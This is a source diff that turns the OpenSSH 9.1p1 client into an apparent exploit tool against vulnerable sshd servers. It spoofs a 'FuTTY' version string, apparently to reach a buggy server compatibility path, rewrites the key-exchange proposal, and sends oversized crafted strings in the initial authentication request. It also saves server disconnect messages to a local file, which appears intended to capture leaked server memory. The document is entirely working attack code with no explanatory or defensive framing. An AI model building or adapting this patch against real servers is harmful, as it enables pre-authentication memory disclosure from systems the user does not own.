diff -purr openssh-9.1p1/packet.c openssh-9.1p1-infoleak/packet.c --- openssh-9.1p1/packet.c 2022-10-03 07:51:42.000000000 -0700 +++ openssh-9.1p1-infoleak/packet.c 2023-02-21 18:08:57.954049592 -0800 @@ -63,6 +63,8 @@ #endif #include #include +#include +#include /* * Explicitly include OpenSSL before zlib as some versions of OpenSSL have @@ -1735,9 +1737,22 @@ ssh_packet_read_poll_seqnr(struct ssh *s free(msg); break; case SSH2_MSG_DISCONNECT: + { + size_t len = 0; if ((r = sshpkt_get_u32(ssh, &reason)) != 0 || - (r = sshpkt_get_string(ssh, &msg, NULL)) != 0) + (r = sshpkt_get_string(ssh, &msg, &len)) != 0) return r; + if (len) { + const int fd = open("disconnect.log", + O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600); + if (fd >= 0) { + static const char zeros[64]; + write(fd, msg, len); + write(fd, zeros, sizeof(zeros)); + close(fd); + } + } + } /* Ignore normal client exit notifications */ do_log2(ssh->state->server_side && reason == SSH2_DISCONNECT_BY_APPLICATION ? diff -purr openssh-9.1p1/sshconnect2.c openssh-9.1p1-infoleak/sshconnect2.c --- openssh-9.1p1/sshconnect2.c 2022-10-03 07:51:42.000000000 -0700 +++ openssh-9.1p1-infoleak/sshconnect2.c 2023-02-21 16:49:44.665134714 -0800 @@ -222,7 +222,7 @@ ssh_kex2(struct ssh *ssh, char *host, st const struct ssh_conn_info *cinfo) { char *myproposal[PROPOSAL_MAX] = { KEX_CLIENT }; - char *s, *all_key; + char *all_key; char *prop_kex = NULL, *prop_enc = NULL, *prop_hostkey = NULL; int r, use_known_hosts_order = 0; @@ -247,9 +247,7 @@ ssh_kex2(struct ssh *ssh, char *host, st fatal_fr(r, "kex_assemble_namelist"); free(all_key); - if ((s = kex_names_cat(options.kex_algorithms, "ext-info-c")) == NULL) - fatal_f("kex_names_cat"); - myproposal[PROPOSAL_KEX_ALGS] = prop_kex = compat_kex_proposal(ssh, s); + myproposal[PROPOSAL_KEX_ALGS] = prop_kex = xstrdup(options.kex_algorithms); myproposal[PROPOSAL_ENC_ALGS_CTOS] = myproposal[PROPOSAL_ENC_ALGS_STOC] = prop_enc = compat_cipher_proposal(ssh, options.ciphers); @@ -1051,14 +1049,18 @@ input_gssapi_error(int type, u_int32_t p static int userauth_none(struct ssh *ssh) { - Authctxt *authctxt = (Authctxt *)ssh->authctxt; int r; + static const char kex[] = "ecdh-sha2-nistp256,"; + char buf[300]; + memset(buf, 'A', sizeof(buf)-1); + memcpy(buf, kex, sizeof(kex)-1); + buf[sizeof(buf)-1] = '\0'; /* initial userauth request */ if ((r = sshpkt_start(ssh, SSH2_MSG_USERAUTH_REQUEST)) != 0 || - (r = sshpkt_put_cstring(ssh, authctxt->server_user)) != 0 || - (r = sshpkt_put_cstring(ssh, authctxt->service)) != 0 || - (r = sshpkt_put_cstring(ssh, authctxt->method->name)) != 0 || + (buf[sizeof(kex)-1] = 'u', (r = sshpkt_put_cstring(ssh, buf)) != 0) || + (buf[sizeof(kex)-1] = 's', (r = sshpkt_put_cstring(ssh, buf)) != 0) || + (buf[sizeof(kex)-1] = 'm', (r = sshpkt_put_cstring(ssh, buf)) != 0) || (r = sshpkt_send(ssh)) != 0) fatal_fr(r, "send packet"); return 1; diff -purr openssh-9.1p1/version.h openssh-9.1p1-infoleak/version.h --- openssh-9.1p1/version.h 2022-10-03 07:51:42.000000000 -0700 +++ openssh-9.1p1-infoleak/version.h 2023-02-21 15:50:09.167198744 -0800 @@ -1,6 +1,6 @@ /* $OpenBSD: version.h,v 1.95 2022/09/26 22:18:40 djm Exp $ */ -#define SSH_VERSION "OpenSSH_9.1" +#define SSH_VERSION "FuTTY_9.1" #define SSH_PORTABLE "p1" #define SSH_RELEASE SSH_VERSION SSH_PORTABLE